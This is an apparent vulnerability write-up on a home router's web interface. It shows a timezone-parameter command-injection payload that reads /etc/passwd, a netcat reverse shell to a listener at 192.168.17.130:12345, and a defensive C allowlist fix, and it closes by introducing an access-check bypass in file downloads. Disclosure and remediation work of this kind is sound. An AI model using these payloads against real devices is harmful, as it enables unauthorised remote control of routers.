When we start the device for the first time and log in to the web interface, we set the language and the timezone.
Using the Fiddler tool to capture the HTTP request:
When we perform this action, the login_cgi script takes the content of the timezone parameter and writes it into the /tmp/TZ file:
Request Forgery
login_cgi
If we try to insert a value that is not in the list of timezones, the script rejects it:
We can bypass this check and write whatever we want into the TZ file, using this payload:
|echo+TEST||a+#'+ ||a #
Replace the payload with:
|echo+TEST||a+#'+|echo `cat /etc/passwd` ||a #
So I can execute commands. On my remote machine I am listening on port 12345 with nc -lvp 12345. Now let's replace the payload with a netcat command:
nc 192.168.17.130:12345 -e /bin/ash
At this point I have the router's shell on my remote machine.
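The root cause of the login_cgi issue above is that the timezone value reaches a shell before it is checked. As an added example (this is not the device's firmware code), here is how a CGI handler can persist the setting safely: the value must match an allowlist entry exactly, and the file is written with stdio rather than through a shell command, so a value containing `|`, backticks or `#` can never be interpreted. The allowlist entries and the output path are assumptions for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed allowlist of POSIX TZ strings. Assumption: the real device keeps
 * its own list in the web UI; these entries are illustrative only. */
static const char *const ALLOWED_TZ[] = {
    "UTC",
    "GMT0",
    "CET-1CEST,M3.5.0,M10.5.0/3",
    "EST5EDT,M3.2.0,M11.1.0",
};

/* Exact-match allowlist check. Because no allowlist entry contains shell
 * metacharacters, an injected value can never pass, and there is no
 * "unknown but looks fine" branch for an attacker to reach. */
bool tz_is_allowed(const char *tz) {
    if (tz == NULL) return false;
    for (size_t i = 0; i < sizeof ALLOWED_TZ / sizeof ALLOWED_TZ[0]; i++) {
        if (strcmp(tz, ALLOWED_TZ[i]) == 0) return true;
    }
    return false;
}

/* Writes the validated timezone to `path` using stdio. The vulnerable pattern
 * this replaces is building a string such as "echo <tz> > /tmp/TZ" and passing
 * it to system(); here no shell is involved at all.
 * Returns 0 on success, -1 if rejected by the allowlist, -2/-3 on I/O errors. */
int write_tz_file(const char *path, const char *tz) {
    if (!tz_is_allowed(tz)) return -1;
    FILE *f = fopen(path, "w");
    if (f == NULL) return -2;
    bool ok = fprintf(f, "%s\n", tz) > 0;
    if (fclose(f) != 0) ok = false;
    return ok ? 0 : -3;
}

/* Reads the first line of `path` back into `out` (size `out_len`), stripping the
 * newline, so a caller can confirm what was actually persisted. */
int read_tz_file(const char *path, char *out, size_t out_len) {
    FILE *f = fopen(path, "r");
    if (f == NULL) return -1;
    if (fgets(out, (int)out_len, f) == NULL) { fclose(f); return -2; }
    fclose(f);
    out[strcspn(out, "\n")] = '\0';
    return 0;
}

/* Stand-alone demo: accepts a valid zone, rejects one carrying shell syntax. */
int main(void) {
    const char *path = "/tmp/tz_example";   /* constructed path for the demo */
    printf("UTC -> %d\n", write_tz_file(path, "UTC"));
    printf("UTC|id -> %d\n", write_tz_file(path, "UTC|id"));
    char buf[64];
    if (read_tz_file(path, buf, sizeof buf) == 0) printf("stored: %s\n", buf);
    return 0;
}
```

The allowlist approach is stricter than filtering characters: the original script evidently had a list check that could be escaped with quoting, whereas an exact string comparison followed by a non-shell write leaves nothing to escape.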
download_file and storage_cgi
The device can share the files on an attached USB storage device over the network and let users download them. If we try to download /etc/passwd, the web server responds with Access Denied, but we can bypass this.